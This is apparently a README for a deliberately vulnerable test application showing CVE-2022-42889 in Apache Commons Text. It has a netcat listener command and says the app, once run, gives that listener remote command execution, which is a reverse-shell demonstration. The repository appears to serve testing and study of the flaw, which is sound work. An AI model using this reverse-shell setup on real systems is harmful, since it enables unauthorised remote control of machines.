# CVE-2022-42889 Test application

This repository contains a simple application using Apache Commons Text < 1.10 which is vulnerable to CVE-2022-42889.

## Running the application

Replace `` nc command by your host ip address. 

Listening with netcat:

$ nc -l -p 30000

Build and run docker vulnerable code

docker build . -t vulnerable-app
docker run vulnerable-app

As you can see netcat will be able to execute remote commands